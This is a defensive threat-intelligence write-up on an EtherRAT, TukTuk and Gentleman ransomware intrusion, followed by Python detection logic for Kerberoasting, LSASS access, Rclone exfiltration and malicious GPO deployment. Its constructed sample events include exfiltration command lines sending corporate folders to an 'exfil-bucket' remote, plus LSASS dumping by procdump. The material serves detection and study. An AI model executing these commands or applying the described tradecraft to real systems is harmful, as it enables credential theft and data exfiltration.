This technical analysis details a multi-stage intrusion involving EtherRAT and the AI-generated TukTuk malware framework, culminating in a domain-wide deployment of The Gentleman ransomware. The attack began with a malicious MSI installer masquerading as the Sysinternals RAMMap utility, which deployed an EtherRAT variant that read its C2 configuration dynamically from the Ethereum blockchain. The threat actors relied on a layered set of decentralized infrastructure, including EtherHiding and Arweave dead-drop resolvers, alongside legitimate SaaS platforms such as ClickHouse and Supabase, so that communication channels survived the takedown of any single endpoint.
Once persistence was established, the actors engaged in hands-on-keyboard activity, including Kerberoasting, LSASS dumping, and lateral movement via GoTo Resolve and NetExec. After exfiltrating sensitive data to Wasabi cloud storage using Rclone, the intrusion concluded with the execution of The Gentleman ransomware. The final payload was distributed across the network using a malicious Group Policy Object (GPO) and scheduled tasks, effectively bypassing traditional defenses through the abuse of legitimate administrative tools.
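As an added example that is not part of the report above, the following Python sketch shows what the hands-on-keyboard stages described (Kerberoasting, LSASS access, Rclone exfiltration to a cloud remote, and GPO plus scheduled-task deployment) look like as detection logic run over event records. The events, field names, host names, user names, paths and allowlists are all constructed for this example; real Security-log (4769, 5137, 4698) and Sysmon (1, 10) telemetry must be mapped onto these fields before the checks apply.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample telemetry (not taken from the report). Shape is loosely
# modelled on Windows Security events 4769/5137/4698 and Sysmon events 1/10;
# every field name, host, user and path here is an assumption.
EVENTS = [
    {"id": 4769, "host": "DC01", "user": "jdoe", "service": "MSSQLSvc/sql01.corp.local", "etype": "0x17"},
    {"id": 4769, "host": "DC01", "user": "jdoe", "service": "HTTP/web01.corp.local", "etype": "0x17"},
    {"id": 4769, "host": "DC01", "user": "jdoe", "service": "CIFS/fs01.corp.local", "etype": "0x17"},
    {"id": 4769, "host": "DC01", "user": "jdoe", "service": "krbtgt/CORP.LOCAL", "etype": "0x17"},
    {"id": 4769, "host": "DC01", "user": "svc_backup", "service": "CIFS/fs01.corp.local", "etype": "0x12"},
    {"id": 10, "host": "WS07", "source_image": r"C:\Temp\procdump.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "access": "0x1fffff"},
    {"id": 10, "host": "WS07", "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "access": "0x1410"},
    {"id": 1, "host": "WS07", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance wasabi:exfil-bucket --transfers 16"},
    {"id": 1, "host": "WS07", "image": r"C:\Users\Public\svchost.exe",
     "cmdline": r"svchost.exe sync D:\HR wasabi:exfil-bucket"},
    {"id": 1, "host": "WS07", "image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy D:\Finance E:\Backup /E"},
    {"id": 5137, "host": "DC01", "user": "admin_ops", "object_class": "groupPolicyContainer",
     "dn": "CN={00000000-0000-0000-0000-000000000001},CN=Policies,CN=System,DC=corp,DC=local"},
    {"id": 4698, "host": "FS01", "user": "admin_ops", "task_name": r"\Update", "command": r"C:\ProgramData\update.exe"},
    {"id": 4698, "host": "FS01", "user": "SYSTEM", "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe"},
]

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; the classic Kerberoast tell
LSASS_ALLOWLIST = {"MsMpEng.exe", "csrss.exe", "wininit.exe"}  # hypothetical allowlist
TASK_ALLOWLIST = {r"\Microsoft\Windows\Defrag\ScheduledDefrag"}  # hypothetical allowlist
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
REMOTE_TOKEN = re.compile(r"^[a-z][\w-]+:")  # rclone "remote:path"; drive letters are one char, so excluded


def detect_kerberoasting(events, min_spns=3):
    """Users requesting RC4 tickets for several distinct SPNs (krbtgt excluded)."""
    spns = defaultdict(set)
    for e in events:
        if e.get("id") == 4769 and e.get("etype") == RC4_HMAC:
            if not e["service"].lower().startswith("krbtgt/"):
                spns[e["user"]].add(e["service"])
    return {u: sorted(s) for u, s in spns.items() if len(s) >= min_spns}


def detect_lsass_access(events):
    """Process-access events against lsass.exe from non-allowlisted images."""
    hits = []
    for e in events:
        if e.get("id") != 10:
            continue
        source = PureWindowsPath(e["source_image"]).name
        if PureWindowsPath(e["target_image"]).name.lower() == "lsass.exe" and source not in LSASS_ALLOWLIST:
            hits.append((e["host"], source, e["access"]))
    return hits


def detect_rclone(events):
    """Rclone by binary name, or a renamed binary by its verb + remote:path syntax."""
    hits = []
    for e in events:
        if e.get("id") != 1:
            continue
        name = PureWindowsPath(e["image"]).name.lower()
        tokens = e.get("cmdline", "").lower().split()
        if name == "rclone.exe":
            hits.append((e["host"], name, "rclone binary"))
        elif RCLONE_VERBS & set(tokens) and any(REMOTE_TOKEN.match(t) for t in tokens):
            hits.append((e["host"], name, "rclone-style remote syntax"))
    return hits


def detect_gpo_and_tasks(events):
    """New GPO containers and non-allowlisted scheduled tasks: the deployment stage."""
    gpo = [(e["host"], e["user"], e["dn"]) for e in events
           if e.get("id") == 5137 and e.get("object_class") == "groupPolicyContainer"]
    tasks = [(e["host"], e["user"], e["task_name"], e["command"]) for e in events
             if e.get("id") == 4698 and e["task_name"] not in TASK_ALLOWLIST]
    return {"gpo": gpo, "tasks": tasks}


def triage(events):
    """Run every stage check and return findings keyed by stage."""
    return {
        "kerberoasting": detect_kerberoasting(events),
        "lsass_access": detect_lsass_access(events),
        "rclone_exfil": detect_rclone(events),
        "deployment": detect_gpo_and_tasks(events),
    }


if __name__ == "__main__":
    for stage, findings in triage(EVENTS).items():
        print(stage, findings)
```

The checks are deliberately narrow on fields rather than on tool names: the SPN-count threshold survives a renamed Rubeus, the `remote:path` token survives a renamed Rclone, and the GPO check fires on the directory-object creation rather than on any particular tool, which matches the report's point that the deployment abused legitimate administrative mechanisms.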